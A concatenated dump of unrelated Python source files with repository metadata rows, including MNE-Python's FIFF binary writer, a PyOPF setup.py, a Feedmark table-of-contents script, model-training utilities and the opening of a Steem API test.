        if len(gaps_covariance) != self.window_length:
            raise ValueError(
                "Covariance len({covariance_len}) does not match bed file window len({window_len}).".format(
                    covariance_len=len(gaps_covariance),
                    window_len=self.window_length,
                )
            )
        gaps_coordinates = generate_synthetic_gaps(
            gaps_mean,
            gaps_covariance,
            self.samples_number,
            chunk_size=50000,
            threshold=gaps_threshold,
            seed=seed
        )
        # Group gap positions (y) by sample index (x).
        gaps_dictionary = {}
        for x, y in gaps_coordinates:
            if x not in gaps_dictionary:
                gaps_dictionary[x] = []
            gaps_dictionary[x].append(y)
        for key in gaps_dictionary:
            gaps_dictionary[key] = np.array(gaps_dictionary[key], dtype=int)
        # The plain-dict copy is kept so the numba typed Dict can be rebuilt
        # lazily (e.g. in worker processes) via _init_gaps_coordinates.
        self._cacheable_gaps_coordinates = gaps_dictionary
        self._gaps_coordinates = None
        # Rendering the starting gaps index, which
        # will be shuffled alongside the bed file.
        # Bug fix: np.int was a deprecated alias of the builtin int and was
        # removed in NumPy 1.24; use int directly (identical behavior).
        self._gaps_index = NumpySequence(
            np.arange(self.samples_number, dtype=int),
            batch_size=batch_size,
            seed=seed,
            elapsed_epochs=elapsed_epochs,
            dtype=int
        )

    def _init_gaps_coordinates(self):
        # Rendering the gaps coordinates as a numba typed Dict (note: `Dict`
        # here is numba.typed.Dict, which shadows typing.Dict at module level).
        self._gaps_coordinates = Dict.empty(
            key_type=types.int_,
            value_type=types.int_[:],
        )
        self._gaps_coordinates.update(self._cacheable_gaps_coordinates)

    def on_train_start(self, *args, **kwargs):
        # Build the typed dict eagerly before training begins.
        super().on_train_start()
        self._init_gaps_coordinates()

    @property
    def batch_size(self) -> int:
        """Return batch size to be rendered."""
        return self._batch_size

    @batch_size.setter
    def batch_size(self, batch_size: int):
        """Set batch size to given value, keeping the gaps index in sync."""
        self._batch_size = batch_size
        self._gaps_index.batch_size = batch_size

    def on_epoch_end(self):
        """Shuffle private bed object on every epoch end."""
        super().on_epoch_end()
        self._gaps_index.on_epoch_end()

    def __getitem__(self, idx):
        # Lazily (re)build the typed dict if on_train_start was never called.
        if self._gaps_coordinates is None:
            self._init_gaps_coordinates()
        return super().__getitem__(idx)
| 36.019481 | 141 | 0.603209 |
e36729c52489f5b1ca441bd3a7ff4b7a0ed44a8e | 14,861 | py | Python | mne/io/write.py | dokato/mne-python | a188859b57044fa158af05852bcce2870fabde91 | [
"BSD-3-Clause"
] | null | null | null | mne/io/write.py | dokato/mne-python | a188859b57044fa158af05852bcce2870fabde91 | [
"BSD-3-Clause"
] | null | null | null | mne/io/write.py | dokato/mne-python | a188859b57044fa158af05852bcce2870fabde91 | [
"BSD-3-Clause"
] | 1 | 2021-04-12T12:45:31.000Z | 2021-04-12T12:45:31.000Z | # Authors: Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Matti Hamalainen <msh@nmr.mgh.harvard.edu>
#
# License: BSD (3-clause)
from gzip import GzipFile
import os.path as op
import re
import time
import uuid
import numpy as np
from scipy import linalg, sparse
from .constants import FIFF
from ..utils import logger
from ..externals.jdcal import jcal2jd
from ..externals.six import string_types, b
def _write(fid, data, kind, data_size, FIFFT_TYPE, dtype):
    """Write a FIFF tag: 16-byte header (kind, type, size, next) + payload.

    Parameters
    ----------
    fid : file-like
        Destination opened for binary writing.
    data : array-like
        Payload, serialized big-endian as ``dtype``.
    kind : int
        FIFF tag kind code.
    data_size : int
        Bytes per element; scaled by ``data.size`` for arrays (string tags
        pass the precomputed byte length instead).
    FIFFT_TYPE : int
        FIFF type code written in the header.
    dtype : str
        Numpy dtype string used to serialize the payload.
    """
    if isinstance(data, np.ndarray):
        data_size *= data.size

    # XXX for string types the data size is used as
    # computed in ``write_string``.

    # tobytes() replaces the deprecated tostring() (removed in NumPy 2.0);
    # output is byte-identical.
    fid.write(np.array(kind, dtype='>i4').tobytes())
    fid.write(np.array(FIFFT_TYPE, dtype='>i4').tobytes())
    fid.write(np.array(data_size, dtype='>i4').tobytes())
    fid.write(np.array(FIFF.FIFFV_NEXT_SEQ, dtype='>i4').tobytes())
    fid.write(np.array(data, dtype=dtype).tobytes())
def _get_split_size(split_size):
"""Convert human-readable bytes to machine-readable bytes."""
if isinstance(split_size, string_types):
exp = dict(MB=20, GB=30).get(split_size[-2:], None)
if exp is None:
raise ValueError('split_size has to end with either'
'"MB" or "GB"')
split_size = int(float(split_size[:-2]) * 2 ** exp)
if split_size > 2147483648:
raise ValueError('split_size cannot be larger than 2GB')
return split_size
def write_nop(fid, last=False):
    """Write a FIFF_NOP (no-op) tag.

    The ``next`` header field is FIFFV_NEXT_NONE when ``last`` is True
    (marks end of file), otherwise FIFFV_NEXT_SEQ.
    """
    # tobytes() replaces the deprecated tostring() (removed in NumPy 2.0).
    fid.write(np.array(FIFF.FIFF_NOP, dtype='>i4').tobytes())
    fid.write(np.array(FIFF.FIFFT_VOID, dtype='>i4').tobytes())
    fid.write(np.array(0, dtype='>i4').tobytes())
    next_ = FIFF.FIFFV_NEXT_NONE if last else FIFF.FIFFV_NEXT_SEQ
    fid.write(np.array(next_, dtype='>i4').tobytes())
def write_int(fid, kind, data):
    """Write a 32-bit integer tag to a fif file."""
    data_size = 4  # bytes per int32 element
    # Big-endian; .T reorders multi-dimensional input before serialization
    # (presumably FIFF's expected column-major convention — confirm).
    data = np.array(data, dtype='>i4').T
    _write(fid, data, kind, data_size, FIFF.FIFFT_INT, '>i4')
def write_double(fid, kind, data):
    """Write a double-precision floating point tag to a fif file."""
    data_size = 8  # bytes per float64 element
    # Big-endian; .T reorders multi-dimensional input before serialization.
    data = np.array(data, dtype='>f8').T
    _write(fid, data, kind, data_size, FIFF.FIFFT_DOUBLE, '>f8')
def write_float(fid, kind, data):
    """Write a single-precision floating point tag to a fif file."""
    data_size = 4  # bytes per float32 element
    # Big-endian; .T reorders multi-dimensional input before serialization.
    data = np.array(data, dtype='>f4').T
    _write(fid, data, kind, data_size, FIFF.FIFFT_FLOAT, '>f4')
def write_dau_pack16(fid, kind, data):
    """Write a dau_pack16 (16-bit integer) tag to a fif file."""
    data_size = 2  # bytes per int16 element
    data = np.array(data, dtype='>i2').T
    _write(fid, data, kind, data_size, FIFF.FIFFT_DAU_PACK16, '>i2')
def write_complex64(fid, kind, data):
    """Write a 64 bit complex floating point tag to a fif file."""
    data_size = 8  # bytes per complex64 element (2 x float32)
    data = np.array(data, dtype='>c8').T
    _write(fid, data, kind, data_size, FIFF.FIFFT_COMPLEX_FLOAT, '>c8')
def write_complex128(fid, kind, data):
    """Write a 128 bit complex floating point tag to a fif file."""
    data_size = 16  # bytes per complex128 element (2 x float64)
    data = np.array(data, dtype='>c16').T
    # Bug fix: complex128 payloads must carry the FIFFT_COMPLEX_DOUBLE type
    # code; FIFFT_COMPLEX_FLOAT (used previously) denotes 64-bit complex and
    # would make readers misinterpret the payload width.
    _write(fid, data, kind, data_size, FIFF.FIFFT_COMPLEX_DOUBLE, '>c16')
def write_julian(fid, kind, data):
    """Write a Julian-formatted date to a FIF file.

    ``data`` must be a (year, month, day) triple; it is converted via
    ``jcal2jd`` and stored as a single int32.
    """
    assert len(data) == 3
    data_size = 4
    # jcal2jd returns the Julian day split into parts; summing yields the
    # full Julian day number.
    jd = np.sum(jcal2jd(*data))
    data = np.array(jd, dtype='>i4')
    _write(fid, data, kind, data_size, FIFF.FIFFT_JULIAN, '>i4')
def write_string(fid, kind, data):
    """Write a string tag (UTF-8 encoded; empty strings write nothing)."""
    str_data = data.encode('utf-8')  # Use unicode or bytes depending on Py2/3
    data_size = len(str_data)  # therefore compute size here
    my_dtype = '>a'  # py2/3 compatible on writing -- don't ask me why
    # Zero-length strings are silently skipped: no tag is written at all.
    if data_size > 0:
        _write(fid, str_data, kind, data_size, FIFF.FIFFT_STRING, my_dtype)
def write_name_list(fid, kind, data):
    """Write a colon-separated list of names.

    Parameters
    ----------
    data : list of strings
        Joined with ':' and written as a single string tag.
    """
    write_string(fid, kind, ':'.join(data))
def write_float_matrix(fid, kind, mat):
    """Write a single-precision floating-point matrix tag.

    The payload is the matrix data followed by a dimensions trailer:
    the shape reversed, then the number of dimensions.
    """
    FIFFT_MATRIX = 1 << 30  # matrix coding flag OR'ed into the type code
    FIFFT_MATRIX_FLOAT = FIFF.FIFFT_FLOAT | FIFFT_MATRIX

    # Payload bytes plus the (ndim + 1)-entry int32 dimensions trailer.
    data_size = 4 * mat.size + 4 * (mat.ndim + 1)

    # tobytes() replaces the deprecated tostring() (removed in NumPy 2.0).
    fid.write(np.array(kind, dtype='>i4').tobytes())
    fid.write(np.array(FIFFT_MATRIX_FLOAT, dtype='>i4').tobytes())
    fid.write(np.array(data_size, dtype='>i4').tobytes())
    fid.write(np.array(FIFF.FIFFV_NEXT_SEQ, dtype='>i4').tobytes())
    fid.write(np.array(mat, dtype='>f4').tobytes())

    dims = np.empty(mat.ndim + 1, dtype=np.int32)
    dims[:mat.ndim] = mat.shape[::-1]
    dims[-1] = mat.ndim
    fid.write(np.array(dims, dtype='>i4').tobytes())
    check_fiff_length(fid)
def write_double_matrix(fid, kind, mat):
    """Write a double-precision floating-point matrix tag.

    The payload is the matrix data followed by a dimensions trailer:
    the shape reversed, then the number of dimensions.
    """
    FIFFT_MATRIX = 1 << 30  # matrix coding flag OR'ed into the type code
    FIFFT_MATRIX_DOUBLE = FIFF.FIFFT_DOUBLE | FIFFT_MATRIX

    data_size = 8 * mat.size + 4 * (mat.ndim + 1)

    # tobytes() replaces the deprecated tostring() (removed in NumPy 2.0).
    fid.write(np.array(kind, dtype='>i4').tobytes())
    fid.write(np.array(FIFFT_MATRIX_DOUBLE, dtype='>i4').tobytes())
    fid.write(np.array(data_size, dtype='>i4').tobytes())
    fid.write(np.array(FIFF.FIFFV_NEXT_SEQ, dtype='>i4').tobytes())
    fid.write(np.array(mat, dtype='>f8').tobytes())

    dims = np.empty(mat.ndim + 1, dtype=np.int32)
    dims[:mat.ndim] = mat.shape[::-1]
    dims[-1] = mat.ndim
    fid.write(np.array(dims, dtype='>i4').tobytes())
    check_fiff_length(fid)
def write_int_matrix(fid, kind, mat):
    """Write an integer 32 matrix tag.

    Note: unlike the float/double variants, the dimensions trailer here is
    hard-coded for 2-D input (``mat`` must be a matrix, not an nd-array).
    """
    FIFFT_MATRIX = 1 << 30  # matrix coding flag OR'ed into the type code
    FIFFT_MATRIX_INT = FIFF.FIFFT_INT | FIFFT_MATRIX

    data_size = 4 * mat.size + 4 * 3

    # tobytes() replaces the deprecated tostring() (removed in NumPy 2.0).
    fid.write(np.array(kind, dtype='>i4').tobytes())
    fid.write(np.array(FIFFT_MATRIX_INT, dtype='>i4').tobytes())
    fid.write(np.array(data_size, dtype='>i4').tobytes())
    fid.write(np.array(FIFF.FIFFV_NEXT_SEQ, dtype='>i4').tobytes())
    fid.write(np.array(mat, dtype='>i4').tobytes())

    dims = np.empty(3, dtype=np.int32)
    dims[0] = mat.shape[1]
    dims[1] = mat.shape[0]
    dims[2] = 2
    fid.write(np.array(dims, dtype='>i4').tobytes())
    check_fiff_length(fid)
def get_machid():
    """Get (mostly) unique machine ID.

    Returns
    -------
    ids : array (length 2, int32)
        The machine identifier used in MNE.
    """
    # Plain .encode() replaces the six.b Py2 shim (hex digits are ASCII,
    # so the result is byte-identical).
    mac = ('%012x' % uuid.getnode()).encode('ascii')
    mac = re.findall(b'..', mac)  # split into 6 two-hex-digit byte pairs
    mac += [b'00', b'00']  # add two more fields

    # Convert to integer in reverse-order (for some reason)
    from codecs import encode
    mac = b''.join([encode(h, 'hex_codec') for h in mac[::-1]])
    ids = np.flipud(np.frombuffer(mac, np.int32, count=2))
    return ids
def get_new_file_id():
    """Create a new file ID tag (machid, FIFF version, current time)."""
    secs, usecs = divmod(time.time(), 1.)
    # Split the timestamp into whole seconds and microseconds.
    secs, usecs = int(secs), int(usecs * 1e6)
    return {'machid': get_machid(), 'version': FIFF.FIFFC_VERSION,
            'secs': secs, 'usecs': usecs}
def write_id(fid, kind, id_=None):
    """Write a fiff id tag.

    The payload is five int32s: version, machid[0], machid[1], secs, usecs.
    When ``id_`` is None a fresh measurement id is generated.
    """
    id_ = _generate_meas_id() if id_ is None else id_

    data_size = 5 * 4  # The id comprises five integers

    # tobytes() replaces the deprecated tostring() (removed in NumPy 2.0).
    fid.write(np.array(kind, dtype='>i4').tobytes())
    fid.write(np.array(FIFF.FIFFT_ID_STRUCT, dtype='>i4').tobytes())
    fid.write(np.array(data_size, dtype='>i4').tobytes())
    fid.write(np.array(FIFF.FIFFV_NEXT_SEQ, dtype='>i4').tobytes())

    # Collect the bits together for one write
    arr = np.array([id_['version'],
                    id_['machid'][0], id_['machid'][1],
                    id_['secs'], id_['usecs']], dtype='>i4')
    fid.write(arr.tobytes())
def start_block(fid, kind):
    """Write a FIFF_BLOCK_START tag.

    Parameters
    ----------
    fid : file
        Open destination file.
    kind : int
        The kind of the block being opened.
    """
    write_int(fid, FIFF.FIFF_BLOCK_START, kind)
def end_block(fid, kind):
    """Write a FIFF_BLOCK_END tag.

    Parameters
    ----------
    fid : file
        Open destination file.
    kind : int
        The kind of the block being closed (must match start_block).
    """
    write_int(fid, FIFF.FIFF_BLOCK_END, kind)
def start_file(fname, id_=None):
    """Open a fif file for writing and writes the compulsory header tags.

    Parameters
    ----------
    fname : string | fid
        The name of the file to open. It is recommended
        that the name ends with .fif or .fif.gz. Can also be an
        already opened file.
    id_ : dict | None
        ID to use for the FIFF_FILE_ID.
    """
    if not isinstance(fname, string_types):
        # Already-open file object: rewind and reuse it.
        logger.debug('Writing using %s I/O' % type(fname))
        fid = fname
        fid.seek(0)
    elif op.splitext(fname)[1].lower() == '.gz':
        logger.debug('Writing using gzip')
        # gzip defaults to compression level 9, which is barely smaller
        # but much slower. 2 offers a good compromise.
        fid = GzipFile(fname, "wb", compresslevel=2)
    else:
        logger.debug('Writing using normal I/O')
        fid = open(fname, "wb")
    # Write the compulsory items
    write_id(fid, FIFF.FIFF_FILE_ID, id_)
    write_int(fid, FIFF.FIFF_DIR_POINTER, -1)
    write_int(fid, FIFF.FIFF_FREE_LIST, -1)
    return fid
def check_fiff_length(fid, close=True):
    """Ensure our file hasn't grown too large to work properly.

    FIFF uses signed 32-bit file offsets, so anything past 2 GB cannot
    be addressed; raise (optionally closing the file first) if exceeded.
    """
    if fid.tell() > 2 ** 31:
        if close:
            fid.close()
        raise IOError('FIFF file exceeded 2GB limit, please split file or '
                      'save to a different format')
def end_file(fid):
    """Write the closing tags to a fif file and closes the file.

    Parameters
    ----------
    fid : file
        The open file to finalize; it is closed on return.
    """
    # A terminal NOP tag marks the end of the tag stream.
    write_nop(fid, last=True)
    check_fiff_length(fid)
    fid.close()
def write_coord_trans(fid, trans):
    """Write a coordinate transformation structure.

    Parameters
    ----------
    fid : file
        Open destination file.
    trans : dict
        Transform with keys 'from', 'to' (coordinate frame ids) and
        'trans' (4x4 homogeneous transformation matrix).
    """
    # 2 frame ids (i4) + two (3x3 rot + 3-vec move) blocks of f4 each
    data_size = 4 * 2 * 12 + 4 * 2
    # tostring() was removed in NumPy 2.0; tobytes() is the exact alias.
    fid.write(np.array(FIFF.FIFF_COORD_TRANS, dtype='>i4').tobytes())
    fid.write(np.array(FIFF.FIFFT_COORD_TRANS_STRUCT, dtype='>i4').tobytes())
    fid.write(np.array(data_size, dtype='>i4').tobytes())
    fid.write(np.array(FIFF.FIFFV_NEXT_SEQ, dtype='>i4').tobytes())
    fid.write(np.array(trans['from'], dtype='>i4').tobytes())
    fid.write(np.array(trans['to'], dtype='>i4').tobytes())
    # The transform...
    rot = trans['trans'][:3, :3]
    move = trans['trans'][:3, 3]
    fid.write(np.array(rot, dtype='>f4').tobytes())
    fid.write(np.array(move, dtype='>f4').tobytes())
    # ...and its inverse
    trans_inv = linalg.inv(trans['trans'])
    rot = trans_inv[:3, :3]
    move = trans_inv[:3, 3]
    fid.write(np.array(rot, dtype='>f4').tobytes())
    fid.write(np.array(move, dtype='>f4').tobytes())
def write_ch_info(fid, ch):
    """Write a channel information record to a fif file.

    Parameters
    ----------
    fid : file
        Open destination file.
    ch : dict
        Channel info with keys 'scanno', 'logno', 'kind', 'range',
        'cal', 'coil_type', 'loc', 'unit', 'unit_mul' and 'ch_name'.
    """
    # fixed-size fiffChInfoRec: 13 + 7 four-byte fields + 16-char name
    data_size = 4 * 13 + 4 * 7 + 16
    # tostring() was removed in NumPy 2.0; tobytes() is the exact alias.
    fid.write(np.array(FIFF.FIFF_CH_INFO, dtype='>i4').tobytes())
    fid.write(np.array(FIFF.FIFFT_CH_INFO_STRUCT, dtype='>i4').tobytes())
    fid.write(np.array(data_size, dtype='>i4').tobytes())
    fid.write(np.array(FIFF.FIFFV_NEXT_SEQ, dtype='>i4').tobytes())
    # Start writing fiffChInfoRec
    fid.write(np.array(ch['scanno'], dtype='>i4').tobytes())
    fid.write(np.array(ch['logno'], dtype='>i4').tobytes())
    fid.write(np.array(ch['kind'], dtype='>i4').tobytes())
    fid.write(np.array(ch['range'], dtype='>f4').tobytes())
    fid.write(np.array(ch['cal'], dtype='>f4').tobytes())
    fid.write(np.array(ch['coil_type'], dtype='>i4').tobytes())
    fid.write(np.array(ch['loc'], dtype='>f4').tobytes())  # writing 12 values
    # unit and unit multiplier
    fid.write(np.array(ch['unit'], dtype='>i4').tobytes())
    fid.write(np.array(ch['unit_mul'], dtype='>i4').tobytes())
    # Finally channel name, truncated and NUL-padded to exactly 16 bytes
    # (use a bytes literal rather than the legacy six-style b() helper).
    ch_name = ch['ch_name'][:15]
    fid.write(np.array(ch_name, dtype='>c').tobytes())
    fid.write(b'\x00' * (16 - len(ch_name)))
def write_dig_points(fid, dig, block=False, coord_frame=None):
    """Write a set of digitizer data points into a fif file.

    Parameters
    ----------
    fid : file
        Open destination file.
    dig : list of dict | None
        Points, each with keys 'kind', 'ident' and 'r'; nothing is
        written when None.
    block : bool
        If True, wrap the points in a FIFFB_ISOTRAK block.
    coord_frame : int | None
        Coordinate frame tag to write before the points, if given.
    """
    if dig is not None:
        data_size = 5 * 4  # kind + ident + 3-vector position
        if block:
            start_block(fid, FIFF.FIFFB_ISOTRAK)
        if coord_frame is not None:
            write_int(fid, FIFF.FIFF_MNE_COORD_FRAME, coord_frame)
        # tostring() was removed in NumPy 2.0; tobytes() is the alias.
        for d in dig:
            fid.write(np.array(FIFF.FIFF_DIG_POINT, '>i4').tobytes())
            fid.write(np.array(FIFF.FIFFT_DIG_POINT_STRUCT, '>i4').tobytes())
            fid.write(np.array(data_size, dtype='>i4').tobytes())
            fid.write(np.array(FIFF.FIFFV_NEXT_SEQ, '>i4').tobytes())
            # Start writing fiffDigPointRec
            fid.write(np.array(d['kind'], '>i4').tobytes())
            fid.write(np.array(d['ident'], '>i4').tobytes())
            fid.write(np.array(d['r'][:3], '>f4').tobytes())
        if block:
            end_block(fid, FIFF.FIFFB_ISOTRAK)
def write_float_sparse_rcs(fid, kind, mat):
    """Write a single-precision sparse compressed row matrix tag.

    Thin wrapper delegating to write_float_sparse with fmt='csr'.
    """
    return write_float_sparse(fid, kind, mat, fmt='csr')
def write_float_sparse_ccs(fid, kind, mat):
    """Write a single-precision sparse compressed column matrix tag.

    Thin wrapper delegating to write_float_sparse with fmt='csc'.
    """
    return write_float_sparse(fid, kind, mat, fmt='csc')
def write_float_sparse(fid, kind, mat, fmt='auto'):
    """Write a single-precision floating-point sparse matrix tag.

    Parameters
    ----------
    fid : file
        Open destination file.
    kind : int
        The FIFF tag kind identifier.
    mat : scipy.sparse.csr_matrix | scipy.sparse.csc_matrix
        The sparse matrix to write.
    fmt : 'auto' | 'csr' | 'csc'
        Storage format; 'auto' infers it from the matrix type.
    """
    from .tag import _matrix_coding_CCS, _matrix_coding_RCS
    if fmt == 'auto':
        fmt = 'csr' if isinstance(mat, sparse.csr_matrix) else 'csc'
    if fmt == 'csr':
        need = sparse.csr_matrix
        bits = _matrix_coding_RCS
    else:
        need = sparse.csc_matrix
        bits = _matrix_coding_CCS
    if not isinstance(mat, need):
        raise TypeError('Must write %s, got %s' % (fmt.upper(), type(mat),))
    FIFFT_MATRIX = bits << 16
    FIFFT_MATRIX_FLOAT_RCS = FIFF.FIFFT_FLOAT | FIFFT_MATRIX
    nnzm = mat.nnz
    # payload: data (f4) + indices (i4) + indptr (i4) + 4-int dims block.
    # BUGFIX: indptr has nrow+1 entries for CSR but ncol+1 for CSC, so
    # size it from the actual array instead of assuming nrow+1 (the old
    # formula was wrong for non-square CSC matrices).
    data_size = 4 * nnzm + 4 * nnzm + 4 * len(mat.indptr) + 4 * 4
    # tostring() was removed in NumPy 2.0; tobytes() is the exact alias.
    fid.write(np.array(kind, dtype='>i4').tobytes())
    fid.write(np.array(FIFFT_MATRIX_FLOAT_RCS, dtype='>i4').tobytes())
    fid.write(np.array(data_size, dtype='>i4').tobytes())
    fid.write(np.array(FIFF.FIFFV_NEXT_SEQ, dtype='>i4').tobytes())
    fid.write(np.array(mat.data, dtype='>f4').tobytes())
    fid.write(np.array(mat.indices, dtype='>i4').tobytes())
    fid.write(np.array(mat.indptr, dtype='>i4').tobytes())
    dims = [nnzm, mat.shape[0], mat.shape[1], 2]
    fid.write(np.array(dims, dtype='>i4').tobytes())
    check_fiff_length(fid)
def _generate_meas_id():
    """Generate a new meas_id dict."""
    secs, usecs = _date_now()
    return dict(version=FIFF.FIFFC_VERSION, machid=get_machid(),
                secs=secs, usecs=usecs)
def _date_now():
"""Get date in secs, usecs."""
now = time.time()
# Get date in secs/usecs (as in `fill_measurement_info` in
# mne/forward/forward.py)
date_arr = np.array([np.floor(now), 1e6 * (now - np.floor(now))],
dtype='int32')
return date_arr
| 34.803279 | 79 | 0.630913 |
123f5cb869d204c260fcd85b06de56c91146ed32 | 2,180 | py | Python | setup.py | marcoscleison/PyOPF | f386c90e63b4f2c46c6d5305f261b6b6619df69f | [
"Apache-2.0"
] | 3 | 2019-05-06T14:43:32.000Z | 2019-09-03T18:20:33.000Z | setup.py | marcoscleison/PyOPF | f386c90e63b4f2c46c6d5305f261b6b6619df69f | [
"Apache-2.0"
] | 2 | 2019-05-06T17:42:59.000Z | 2019-06-26T14:35:00.000Z | setup.py | marcoscleison/PyOPF | f386c90e63b4f2c46c6d5305f261b6b6619df69f | [
"Apache-2.0"
] | null | null | null | """
Copyright 2019 PyOPF Contributors
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from setuptools import setup
import sys
import subprocess
import os
from distutils.core import setup, Extension
from setuptools import setup, find_packages
from distutils.core import setup, Extension
from distutils import sysconfig
import pybind11
class get_pybind_include(object):
    """Lazily resolve the pybind11 include directory.

    Importing pybind11 is postponed until ``str()`` is called, so that
    ``__init__`` can first pip-install it on the fly when missing.
    """
    def __init__(self, user=False):
        try:
            import pybind11  # availability probe only
        except ImportError:
            # subprocess.call returns a non-zero status on failure
            status = subprocess.call(
                [sys.executable, '-m', 'pip', 'install', 'pybind11'])
            if status:
                raise RuntimeError('pybind11 install failed.')
        self.user = user
    def __str__(self):
        import pybind11
        return pybind11.get_include(self.user)
# Build flags: C++14 (gcc spelling '-std=c++1y') with OpenMP enabled;
# the linker must also see -fopenmp.
cpp_args = ['-std=c++1y', '-O3', '-fopenmp', '-Wall']
link_args= ['-fopenmp']
# Single native extension wrapping LibOPFcpp via pybind11.
ext_modules = [
    Extension(
        'pyopf_native',
        ['pyopf_native_/src/pyopf_native.cpp'],
        language='c++',
        extra_compile_args = cpp_args,
        extra_link_args = link_args
    ),
]
# Header search paths from the installed pybind11 package
# (global site and user site include directories).
pybind_includes = [pybind11.get_include(), pybind11.get_include(True)]
# 'pybind11/include',
setup(
    name='pyopf',
    version='0.0.1',
    include_dirs=['pyopf_native_/include', 'pyopf_native_/LibOPFcpp/include'] + pybind_includes,
    author='Marcos Cleison and Contributors',
    author_email='marcoscleison.unit@gmail.com',
    description='Python bind for libOPFcpp',
    ext_modules=ext_modules,
    packages=['pyopf']
)
| 29.066667 | 96 | 0.705505 |
2ab323ae580625cfd641b6a95439c169381380dd | 1,576 | py | Python | eg/table-of-contents.py | catseye/Feedmark | 4fc7668f7baf40870661fe7f01a2065d6c010005 | [
"MIT"
] | null | null | null | eg/table-of-contents.py | catseye/Feedmark | 4fc7668f7baf40870661fe7f01a2065d6c010005 | [
"MIT"
] | null | null | null | eg/table-of-contents.py | catseye/Feedmark | 4fc7668f7baf40870661fe7f01a2065d6c010005 | [
"MIT"
] | 1 | 2020-05-14T08:01:39.000Z | 2020-05-14T08:01:39.000Z | #
# Example of a Python script that creates a table of contents from
# the JSON extracted by feedmark from a set of Feedmark documents.
#
import json
import re
import subprocess
import sys
import urllib
def generate_toc_line(document):
    """Render one Markdown bullet ("* [title](url) signs") for a document.

    `document` is a dict from feedmark's JSON output with at least
    'title' and 'filename'; 'sections' and 'properties' are optional.
    """
    # BUGFIX: urllib.quote moved to urllib.parse in Python 3; import the
    # right one so the script runs on both major versions.
    try:
        from urllib.parse import quote
    except ImportError:  # Python 2
        from urllib import quote
    title = document['title']
    filename = quote(document['filename'])
    sections = document.get('sections', [])
    properties = document.get('properties', {})
    # You may wish to display some information after each entry in the ToC.
    signs = []
    # Display a count of the sections in the document.
    signs.append('({})'.format(len(sections)))
    # Display (U) if the document is under construction.
    if properties.get('status') == 'under construction':
        signs.append('*(U)*')
    # Display the year of publication, if the document provides a
    # publication-date (extracting a "Month YYYY" fragment when present).
    if properties.get('publication-date'):
        pubdate = properties['publication-date']
        match = re.search(r'(\w+\s+\d\d\d\d)', pubdate)
        if match:
            pubdate = match.group(1)
        signs.append('({})'.format(pubdate))
    return "* [{}]({}) {}\n".format(title, filename, ' '.join(signs))
def output_toc(filenames):
    """Run feedmark over the given files and print one ToC line each."""
    raw = subprocess.check_output(["feedmark", "--output-json"] + filenames)
    data = json.loads(raw)
    for document in data['documents']:
        sys.stdout.write(generate_toc_line(document))
if __name__ == '__main__':
    # Example invocation: build a ToC from these two Feedmark documents.
    output_toc([
        'Recent Llama Sightings.md',
        'Ancient Llama Sightings.md',
    ])
| 29.735849 | 100 | 0.653553 |
2be22a0a3bce3aabf451c6c8336e908a42ec7376 | 1,650 | py | Python | utils.py | YilinLiu97/AmygNet-Pytorch | d5bb244fd930791345d38f09870a7ded633f4622 | [
"MIT"
] | 3 | 2019-06-11T01:38:34.000Z | 2020-04-16T00:36:10.000Z | utils.py | YilinLiu97/Amygdala-Net | d5bb244fd930791345d38f09870a7ded633f4622 | [
"MIT"
] | null | null | null | utils.py | YilinLiu97/Amygdala-Net | d5bb244fd930791345d38f09870a7ded633f4622 | [
"MIT"
] | null | null | null | import numpy as np
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
class WeightEMA(object):
    """In-place exponential moving average of a teacher model's weights."""
    def __init__(self, model, tea_model):
        # Keep both models and snapshot their parameter lists once.
        self.model = model
        self.tea_model = tea_model
        self.params = list(model.parameters())
        self.tea_params = list(tea_model.parameters())
    def step(self, alpha, global_step):
        # tea = alpha * tea + (1 - alpha) * student, applied in place.
        # `global_step` is kept for interface compatibility; unused here.
        for teacher_p, student_p in zip(self.tea_params, self.params):
            teacher_p.data.mul_(alpha)
            teacher_p.data.add_((1.0 - alpha) * student_p.data)
def sigmoid_rampup(current, rampup_length):
    """Exponential sigmoid ramp from exp(-5) up to 1 over `rampup_length`."""
    if rampup_length == 0:
        return 1.0
    clipped = np.clip(current, 0.0, rampup_length)
    phase = 1.0 - clipped / rampup_length
    return float(np.exp(-5.0 * phase * phase))
def get_current_consistency_weight(weight, epoch, rampup):
    """Scale `weight` by the sigmoid rampup factor at `epoch`."""
    out = weight * sigmoid_rampup(epoch, rampup)
    print('Consistency_weight: ', out)
    return out
def weight_schedule(epoch, max_epochs, max_val, mult, n_labeled, n_samples):
    """Scale max_val by the labeled-data fraction, then apply a ramp-up.

    NOTE(review): ``ramp_up`` is not defined anywhere in this module as
    shown — presumably it lives elsewhere in the project; confirm it is
    importable before calling this function.
    """
    max_val = max_val * (float(n_labeled) / n_samples)
    return ramp_up(epoch, max_epochs, max_val, mult)
| 28.448276 | 76 | 0.603636 |
9fda6bfcb68d1b67a6c1ee26cd214b8d9a8f4641 | 5,264 | py | Python | python_scripts/tests/api_tests/test_ah_get_ops_in_block.py | ZhengGuoDeveloper/steem | c6d6f0687879b47f97ce786b049d3d8bfc6d1c35 | [
"MIT"
] | 2,189 | 2016-04-02T21:49:13.000Z | 2022-03-31T23:31:07.000Z | python_scripts/tests/api_tests/test_ah_get_ops_in_block.py | ZhengGuoDeveloper/steem | c6d6f0687879b47f97ce786b049d3d8bfc6d1c35 | [
"MIT"
] | 2,798 | 2016-04-11T18:01:05.000Z | 2022-01-15T23:05:39.000Z | python_scripts/tests/api_tests/test_ah_get_ops_in_block.py | ZhengGuoDeveloper/steem | c6d6f0687879b47f97ce786b049d3d8bfc6d1c35 | [
"MIT"
] | 908 | 2016-03-23T18:26:20.000Z | 2022-03-07T21:43:27.000Z | #!/usr/bin/env python3
"""
Usage: script_name jobs url1 url2 [wdir [last_block [first_block]]]
Example: script_name 4 http://127.0.0.1:8090 http://127.0.0.1:8091 ./ 5000000 0
set jobs to 0 if you want use all processors
if last_block == 0, it is read from url1 (as reference)
"""
import sys
import json
import os
import shutil
